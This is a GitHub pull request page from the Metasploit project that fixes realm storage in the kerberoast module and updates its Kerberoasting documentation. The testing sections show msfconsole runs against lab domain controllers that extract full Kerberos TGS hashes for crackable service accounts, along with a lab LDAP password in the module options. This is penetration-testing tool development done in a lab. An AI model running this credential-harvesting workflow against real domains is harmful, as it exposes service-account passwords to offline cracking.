Skip to content

Kerberoasting Improvements - Doc Update + Realm Fix - #21447

Merged
smcintyre-r7 merged 5 commits into
rapid7:masterfrom
jheysel-r7:fix/kerberoasting_realm_reporting
May 19, 2026
Merged

Kerberoasting Improvements - Doc Update + Realm Fix#21447
smcintyre-r7 merged 5 commits into
rapid7:masterfrom
jheysel-r7:fix/kerberoasting_realm_reporting

Conversation

@jheysel-r7

@jheysel-r7 jheysel-r7 commented May 12, 2026

Copy link
Copy Markdown
Contributor

This PR addresses sub-issues number 1 and 3 which were raised in issue: Kerberoast Improvements #20871

  1. Fixes the kerberoast module which was not properly storing the realm value in the database for hashes found when running the module. Now the realm value is successfully stored along side the rest of the hash's attributes.

  2. Not fixed in this PR - for context this sub-issue was handled by h00die in PR Add Kerberos type hashes to cracking #20881

  3. Updates the kerberoasting.md documentation. These docs were written before the kerberoast module existed and instructed users to use a combination of impacket dependent modules, the kiwi extension and the hashcat binary outside of msfconsole. This workflow can be executed from entirely within metasploit and the docs now reflect that capability.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use gather/kerberoast
  • Provide LDAP session or RHOST credentials
  • Run module
  • Run the creds command
  • Verify the realm has been properly stored in the database
  • Verify the new documentation accurate describes the steps to recover plaintext passwords via kerberoasting

Testing

msf auxiliary(gather/kerberoast) > creds
Credentials
===========

id  host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
--  ----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf auxiliary(gather/kerberoast) > options

Module options (auxiliary/gather/kerberoast):

   Name                   Current Setting     Required  Description
   ----                   ---------------     --------  -----------
   DomainControllerRhost  172.16.199.200      no        The resolvable rhost for the Domain Controller
   Rhostname              dc2.kerberos.issue  no        The domain controller's hostname
   SSL                    false               no        Enable SSL on the LDAP connection
   TARGET_USER                                no        Specific user to kerberoast
   Timeout                10                  yes       The TCP timeout to establish Kerberos connection and read data


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LDAPDomain    kerberos.issue   no        The domain to authenticate to
   LDAPPassword  N0tpassword!     no        The password to authenticate with
   LDAPUsername  administrator    no        The username to authenticate with
   RHOSTS        172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         389              no        The target port


View the full module info with the info, or info -d command.

msf auxiliary(gather/kerberoast) > run
[*] Running module against 172.16.199.200

[*] Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE administrator@KERBEROS.ISSUE
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:389 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260512103413_default_172.16.199.200_mit.kerberos.cca_812326.bin
[*] Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE administrator@KERBEROS.ISSUE
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:389 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260512103413_default_172.16.199.200_mit.kerberos.cca_282257.bin

[+] Query returned 2 results.
[+] Success:
$krb5tgs$23$*user1$KERBEROS.ISSUE$http/dc2.kerberos.issue*$9f9ee05d43e534c2a133530115aacda1$3cc43e5234c1001f5279a33f439f3a336db79ca624ba8afa4d1a4e5bd64b042a6f6e7db3ed7f5e86df89e7f2fb0e84394bf9e9701d3c2532a8a40d91e1129daa7effca1c642c3ce2a75642d03d56f4a7b533e6be96504ed410632d6fb4fd10d5b63e2bdb2d1c852e1572eabd5191ee696717c4561f7afc6b5f12a1623c9430b9b0d109541aa2de40aef3850f14c1880a8a133b852111e41e28cb69f96bb8292ebb946bd59effe5c40dcad10ba12a97308c680603c1da7bd1031cf00ec1a26833036d25416ef39c338f907432337ae4cf24c6574a7e9ebb7b73b739142b01abab8089aeb7d67124b2738c38015dcdde08a400d575aabc76d7426e9132b0a11929345be17d75e5f90709bcc03739ad55e15ffe7b7576993f07c66e38d62ad61badf7b388596431c783db6b1fdae9fb04bb4b28c4894b8e968cf6a869e38fbc7364ede0470801c3a539a138c12514fd17395b4ae4e8227517d9a034522f661aa34f2cbfd6f774a032a514202383449aeea037ca95956969eb2b14bc6c0765620ce81a38d2d1a4e006d8276bfa724127fb662fd74be668ec4bfc4f2537b3b140741f0cd8f450c1d3634340aed1891da3c5e20ab1ef6edfca374abda22f782e77c39195b11075177bb41a372dc0930613b6c3d861b026d4f8951f8ed68fc53b582a3e0a09f272d97bf5d5286ab682c5beca133eec693b3139b91428d800efdba38d3107c1ab2401407012fff09908b57c54db4c0df62ecfc1e0732991d7d03cfdf44db4ad8e1c615cbb02f167edc36f6ba4a525d09046cf23f4de18b5156f0362d2d16aceffb74c3ddf436189c1f683aff649827f67ee5e0ba7402242edb5c40cf882d24d06ac171e2aacecd646e9df35419292fa3d51f081fdfee833947abfc0f6547b6cb899b21dd00e42c07d58a738f90cd25771afbc596483d885abc6bb9974f733930b944df527e72a5e36f05c78fa8726e9afbe40e2fc3298b0ff8ce5e3761c2105449afce18c7a8c6e69c40999e4458540242c168e006812a3fc8c446f06f4991c8d64f7feb89ed9dfe5928d4916ecfb6855df83a1084f1945943664aa0891e8fe99b07dab6d273147624a394c2feb0d3b04a69a7c7fc8434ce179c152fb8e1f58c8337c89b8831d8275eeb4e9043dc63b101306244ed842aab6a4f41d52a873537d578b32e29d85ffc1875fbec0cd0d22b1ac3becf7c4ca27fdc992ace623cde8012139252e94da4bebeb0deb90b58238d6ebc004d6f69bdcfd56e372766420d6825cb76be4e5424e63693d5f9c972c1d260c0372815e19971b2c8f43bc3c6c3b61054483ce204375a7cecbe74f1888eff424f9adfe2f349b8344c2c5891c871b985c9be780d9cfdaa1c408b8527c073a19e0ce6ceadfe075f531216b818fa908989804c14dbf7da19e3a09e4c2e86a13c22bf540ef23bc2898936f330686c1164d3acecbc8335dc61984369537799efccc1d52d76d47ceb1b49a1845dedfdad24a1851a66ed07b580e6754c98f824fc1d7f9f369f13ea26113a538516806cd4becf386b1aa0770ed0d46fc2368ea53d6fbe4b7ee498a0493927bf3f4ed59a0f98ce95ce0a766a788b22605f9f66883e6fea57a35979c8b53b0514d7cc1edf462915cc8df2b7969536f0e2db8a1163b9bc26d255d0d98cbcc48bb5ff9dd141cc1754a
$krb5tgs$23$*svc_kerberoastable$KERBEROS.ISSUE$DC2/svc_kerberoastable.KERBEROS.ISSUE:1337*$066904f1d6ff78e1888eae25cf71c9ec$9ef73c115972c113c38955cc3fc77e35b6622397a642d300bfbc03014cca47b445b1b384c1231ec5178798e9385d3941896b543049838d9ca5df42c32be97f1407d74feb834b82f59643427f3e0b6486f04f1848a6d63a3f055959c5ab67536a8fd0160f8fe5c1395f26ccfb398d689e368b40b67e688f1acf96de1089927770f6e3763722a62545dff72b12c0d96aa65113bbfbf181ef2ee23c9b43ba69894375ea7965b272e1bd56dbc01e28fd28d33ac8512da718235c3a27dbe861d0fd45d40cbbd4c720184881c91d199104061dc73c905be829a819627c35b503f92fad6766fea497c3ade6a4043d9369fd4f234ce9030326069a2dd6eaaf81fa23f7e2e7410533670d6f4a131dd3837ef7ff3b4e44369354559979bfda4294ad5fa318a1011a72ba8c2caf896858bbfe84cb080efa5afeadd5e2ae14ae722c536baf0b6046fbcaca2bcea2ff4bcb14c2a54c91e6a8811f8be750a7207580440b9f6d5e12ffb7a24e1853191f1c83de258944097201e0d3de2269394358059a00d6a2f182044bff3ad64763a34bb8afeb9759cd36dfc3e60918859090ba7927e1660b0d9c0fb6c30444f08b7a88281124a384483125de45041499385b4e1d8d67b3b92d1ff5774122f95b2e6f0c7afd61957225754e2809619282c10d45524af2d45654071cd18f11e32a632fec5fb5df7aeb01b72f6f976d6f1ba71dff398daef349fa39e90bf4735d7215dcb21118e6d9fc03a2ddeb1c8a895d6d2a961b4435342a47b2cd1da408738f4e736fb4c3254f1bce989a961ba845ed318922e07997225463b6b692c92609b11cf6e96e8a05a0f8253510a6542ca052a9c95669a45eb3c2e22a354cd403723158881ad1a63f5dcc9ce519ba7017607f8f3642d2cd67452b6aad8c53cfb05adb1dc80e20817cdfaf0393627d5b924dff93fc432f3a3c8e9afca9b1a969f1cb707895f1d3f66d17f24731a54eebbeff3dc083d6c5b3b602f647d65e1767832e1f6236f451035c6f73af6cc06a5fd8809cb12f9b9425da5cb8c66dc3bdf4320473444bbaad454dd18f2f851871279c987f874d436c2eb7008ee89ef34d42a5508b7e2a5c493d65c938a6769189c79b853a3604f39893c323430735db687023fb7a8f06d1e48237d110bc477bb5c8e15dfa6ad5a9c43121776c7cd89880f4bb2bd780b0fbdff3d0ccb40c470a14390718d8e0d490f68ddb1dff6d9f60aedc98cf77da2732a3ded7cda8e5b168821559057a3176541e9ed931d6674a39e15947ca8d6198d61b831710144b0d6b8c441a42878fdf464f8682c2d554413c0ccb738c433ebb33272c47b479edf6aa28db14822150c8f4f0dc45481b0b02e582431eb9ee451842321f9d1eccdb662e9dd3cd91fb3024452567b6037f7bac5c00ada319c1fefc29fbe4f3283304cb3b13b25c7eccfd61ec09663179d3bd8f444101f023c789d11f9674f31cc0f5c865af0ce5bc158adc957071729da59a303b509c4cf3eff33b6fa433d49804fc690f6b837deb17b38bc6f247e920c8a17244f566b47684bfa77b0ee03f0eb03e29d802fd32573d03e1f907887c409178aa6f50ab1d8381127c317116deb7dc9101f774a13d4e0c423f9a28c551f2bae232aefba057905caa3ba6090e67f2d709a986cc1c6dd742fba267d6a97e86c480551d1c48
[*] Auxiliary module execution completed
msf auxiliary(gather/kerberoast) > creds
Credentials
===========

id  host            origin          service             public  private                                                                                   realm           private_type        JtR Format   cracked_password
--  ----            ------          -------             ------  -------                                                                                   -----           ------------        ----------   ----------------
19  172.16.199.200  172.16.199.200  389/tcp (Kerberos)          $krb5tgs$23$*user1$KERBEROS.ISSUE$http/dc2.kerberos.issue*$9f9ee05d43e534c2a (TRUNCATED)  kerberos.issue  Nonreplayable hash  krb5tgs-rc4
20  172.16.199.200  172.16.199.200  389/tcp (Kerberos)          $krb5tgs$23$*svc_kerberoastable$KERBEROS.ISSUE$DC2/svc_kerberoastable.KERBER (TRUNCATED)  kerberos.issue  Nonreplayable hash  krb5tgs-rc4

@github-actions

Copy link
Copy Markdown

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We've added the additional-testing-required label to indicate that additional testing is required before this pull request can be merged.
For maintainers, this means visiting here.

@smcintyre-r7 smcintyre-r7 self-assigned this May 14, 2026
@smcintyre-r7 smcintyre-r7 moved this from Todo to In Progress in Metasploit Kanban May 14, 2026
Metasploit ships a native Kerberoasting module, `auxiliary/gather/kerberoast`, which does everything end-to-end without
requiring Python, Impacket, Kiwi, or any other external tooling: it queries LDAP for kerberoastable accounts, requests
TGS tickets from the KDC, and stores the resulting hashes in the Metasploit credentials database. Once the hashes are in
the database, the `auxiliary/analyze/crack_windows` module can crack them in `hashcat` mode and write the recovered

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Only in hashcat mode?

Comment thread docs/metasploit-framework.wiki/kerberos/kerberoasting.md

@smcintyre-r7 smcintyre-r7 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Docs all look good. I did run into some issues while testing the module though. The root problem is that LDAPDomain isn't consistently the correct value in this context. I PR'ed jheysel-r7#9 to pull it from the LDAP server so it should always be correct regardless of the authentication settings.

@github-project-automation github-project-automation Bot moved this from In Progress to Waiting on Contributor in Metasploit Kanban May 14, 2026

@smcintyre-r7 smcintyre-r7 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

msf auxiliary(scanner/ldap/ldap_login) > sessions

Active sessions
===============

  Id  Name  Type  Information                          Connection
  --  ----  ----  -----------                          ----------
  1         ldap  LDAP smcintyre @ 192.168.159.10:389  192.168.159.128:33235 -> 192.168.159.10:389 (192.168.159.10)

msf auxiliary(scanner/ldap/ldap_login) > creds 
Credentials
===========

id  host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
--  ----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf auxiliary(scanner/ldap/ldap_login) > previous 
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf auxiliary(gather/kerberoast) > run SESSION=-1
[*] Running module against 192.168.159.10

[*] Using cached credential for krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL smcintyre@MSFLAB.LOCAL
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20260519154006_default_192.168.159.10_mit.kerberos.cca_554583.bin

[+] Query returned 1 result.
[+] Success: 
$krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$b4f13d277b1ae767b8109474ab1909a0$f63b002edfa6ddccec6058511e8775f72b389c8badb40421596e8e8bb65271f3bba0891069fa98de5de60863a5ac3b49cbf4f68a48b7c046b17f9adf9d67f10d651ca0e4336f14e870379949a166523bf8a92f2980ec73814363f220322943b2f2010825b6a255aaea3e2da0e71b10d5debeb586a5d1d919ba0db99eeaad9a5500968374fb3eaf7a79e2dc0d9d0965be822d91fc846a26ef55406f8305e6b220f6b74c9923a310a91fb3867b8b1d97a24458f2f372f09e04a6f45df779f96df6a16b8e01f81724646cd6c3f680cc7cd2dc0aec64b5b7f84faa3b0014d13f0f4c8cd2319c662766a3666d3fcc98593d9677fb9aa45bf90abbef1cca81b63565a8bac32529836bb51bb2abd28b5b7576a5315a5afa59429e946e5f5525828a8bc1a3f6696fd121bf00167baa8a4920aa92893fe608fadcc64c92980e3718dede8fc1298ba35e6909fa6600c916dcd3b9135ffd31688fdfd4284b41e6b30f25df4efa9ec610484e7b28b86d1c3da3e6f7c9db773c7687f045dbf6e14e6f97c01f3d99b1f7ffa718492a62f1adaa13e0369ca9639d9230d15d4ec07f394472a367ecea255507f49b2891692d69300d2826f35e967b62c7cf987272d104d724eb05cac81aa62082c479408524840ac573392068bdeebb34ea96710015984cdcbe88bb88bef3675c335806ca4814cc1613aa2f33caacc6b3e14396fcf62c5896ddffdacde82424225a2d5db075e19c726432a88358c4185d46d519e31072d0394d747476a2557865f506d6b69cdfb3fba62c13bc71b4f745cf0389d5e094f80187c17752f482029d2e2a2eabf2d2ababeab971474df3355b1fd410c1b89287a74184024409f6ea493a1483ecf51022d808246cbd8c024f8c19f1c0d4037036a91778215a067d719ecefd511d0f67f555907a423a5066da2ca391a1cfb73eaa35d31d24a516540f6bae19a203eb442e2d70d671d1b0a5994e6ece275612bb35a3808d302044c51a1a90812f41f8a7e45d95de88d9317c8bb69846c800247c0bc57a2e04cbe63c467f760dd982e44fb361478f6a7267a4daa9bcbe107714e9231b1ecf90ea5bf1ddf20e3ef55b15b94b73ab9398c05d27a5c9243902861239309ee4a0398bdbeb018964cd6972ab638f01e507e5e44ef0ca88f52795c900d7649ab101582f675b09b6321d46bc749e789cbba09c72024e4f30c8366cad5604adfe24e7844d48d9dc1e773cbefede2f7c73a2413c1b13b6c9b39702a1da081526a03f4718bee487e929f24d684595f0b4a5bc64c262e4151654628ad04f8f06561e5160caa1651ed4afda2bf29301613dd127ebc3ff644c0249b162438a0a25fbb33f333d08b13e6675008fb7ebcb525515a2117c7a120ae2769299bcc4588f3f26cfbfdbe8dbe51aef4b75e581b04a58daaa86e79058ff9b6a5d1dc266017db7b0d0a4e7f1cb2578b8f6d26bb72d4175cbcc9654745927dbfc57ec915d8529e1a900ae355f614358029923e281a034aade970b9769ee07022098d9dc63a8c6c7328cee2fdc3be7d46f1207c1a0927cb7637ab806cb6d032e5652be5d3c43be35ae7d
[*] Auxiliary module execution completed
msf auxiliary(gather/kerberoast) > creds
Credentials
===========

id   host            origin          service            public  private                                                                                   realm         private_type        JtR Format   cracked_password
--   ----            ------          -------            ------  -------                                                                                   -----         ------------        ----------   ----------------
344  192.168.159.10  192.168.159.10  88/tcp (kerberos)          $krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$b4f13d2 (TRUNCATED)  msflab.local  Nonreplayable hash  krb5tgs-rc4

msf auxiliary(gather/kerberoast) > creds -d
Credentials
===========

id   host            origin          service            public  private                                                                                   realm         private_type        JtR Format   cracked_password
--   ----            ------          -------            ------  -------                                                                                   -----         ------------        ----------   ----------------
344  192.168.159.10  192.168.159.10  88/tcp (kerberos)          $krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$b4f13d2 (TRUNCATED)  msflab.local  Nonreplayable hash  krb5tgs-rc4

[*] Deleted 1 creds
msf auxiliary(gather/kerberoast) > run SESSION=
[*] Running module against 192.168.159.10

[*] Using cached credential for krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL smcintyre@MSFLAB.LOCAL
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:389 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20260519154014_default_192.168.159.10_mit.kerberos.cca_366132.bin

[+] Query returned 1 result.
[+] Success: 
$krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$a7090245be281be5cad779eac2e00cc1$9ff0635a2b719238951e386609b1f33e50260302769fce38f1882bc220bf6ddb6b69a9b71ca9d6002c29200a3c1a40ff08aa4aab69287e046a5ca36e068feb799fe20a37f32c8479eadeb72de2b9bd38fbfedb81bafdb6df8176ea2d05f3cb2352a14cd8f929ee693d8de22d3a7f680e0340176dafe2161a7662aa1de5a22a3b32d276ce07b9227e6012b75c6259bad29fff1bfaaf257b4026b09bad8e5fc6ef094922c77232dba6566498c7693803e8640121fc59ee4cb068b96ac76df8668c2913f548c2c2362bb8b5e2ca4aae4e05266d9c747a686d67f4bd781ed694edd2ea45b3542f4eddc2093335a8046279744d248ced25cffc74346e0a4bd25d61c622fa99a55c24fb9466d8aa95406f8aa8a2446610360174f7875119c1fb32e98d41c2b15c873d2bb50bc2edfe1735f5977712a036c2f9ddbb85f16bb4db12e10dd1b8694f8faf9271cd9864a1079fadc81041b7d20b149f282042bfe11d44862dc97812f60e11cc577eb94936bb365dcec8e8c38f792b343758bb48984d6f2e3cb5d98a9a4a6c90f0831dad41e14940b198325d4eb7d555263be0d474d9e1b3decf81307843e53a3599de7d93bae7c0b10cb13ac929b1b5e25f9ee3acc8eaa471ce373fd79b30565a0d3cc1bce0372665d74c3c5ac39a24d8e6edf4bab677788d49b278bb3f633a4c9da7f97ef47c522c07ef2cd1df5536f10861d1a8c68be6682ef5cda250ed98afd9d80aa14249e9c677d07271f055a4a8527d6458b73ddac3154ca2d181833d67c1de8b44af7f8ac5621c8f182d26b94c70a8a90a315fd53b919363fd553a81758d323f716228d869729229d1d85c724365b5e49e39eb855ac625df3b2f3f5c5e422d11a1d53dcfe40978c293c1d94863e8e94d05e04896e408903bb5cf1d4f3d33d569fb7930d8b14bf56ba14d0223a41facf0f5b6ca9a3092bf9334a6540ae17c747085ac26172c2483808f5c39ba55ea03f0d62d94d28a323b134c9d67a94a4f14616a1c4bcd36075ae2ea54489877a832953b941f9761bc8593b1a3996ead4788292cddbd5f333f65d203e542dfa10fea0e1846f8e02283c1c8922a0c4cf0b200746372de8eb62a10686c0268d1125dc59e26129daa79977274ed072dcdb14cacf34eb6e29410b5b0369d6ccc6ba75a01f10b81d63dff2708df006a9de471c50a580a90d180c81982107d0578b342655dcd247c059c60fef7a87926703816eaf2d591f3b29e530bebccf98cbbf894d8ec93aac6fd0be32bc2fbeaa892286ce975e3e9028e7816eb601899cc655ac581b5e9baa850ae94707381283a04dbfc60a2c61633db3185eb416ca9d11732024d6043c7e030bd205ecd5e75ab1bb942c2a73049fb994ce976e4774d3c1fd8858261d0bf5bf242b0efc2e4355db019c863c148bb871af525bae6c66021e799a7b0ca728bd8aedd6b3336bb6075e740b6a21c7527da3ebf3633299d16cba14611443b871354636e44c245afd4e0d77dadaa7370d70a1ae06dc50b44daa4e00f6f8a22202da3c8eb12b520b8e6db63248ab890e0acda584c0df4aba2add32c5458cf6572e6167f
[*] Auxiliary module execution completed
msf auxiliary(gather/kerberoast) > creds
Credentials
===========

id   host            origin          service            public  private                                                                                   realm         private_type        JtR Format   cracked_password
--   ----            ------          -------            ------  -------                                                                                   -----         ------------        ----------   ----------------
345  192.168.159.10  192.168.159.10  88/tcp (kerberos)          $krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$a709024 (TRUNCATED)  msflab.local  Nonreplayable hash  krb5tgs-rc4

msf auxiliary(gather/kerberoast) > 

@github-project-automation github-project-automation Bot moved this from Waiting on Contributor to In Progress in Metasploit Kanban May 19, 2026
@smcintyre-r7
smcintyre-r7 merged commit 723507b into rapid7:master May 19, 2026
45 of 50 checks passed
@github-project-automation github-project-automation Bot moved this from In Progress to Done in Metasploit Kanban May 19, 2026
@smcintyre-r7

Copy link
Copy Markdown
Contributor

Release Notes

This updates Metasploit's documentation to describe how a kerberoast attack can be performed entirely with Metasploit. It also updates the kerberoast module to correctly log the realm to the database regardless of if an existing LDAP session was used or not.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

Archived in project

Development

Successfully merging this pull request may close these issues.

3 participants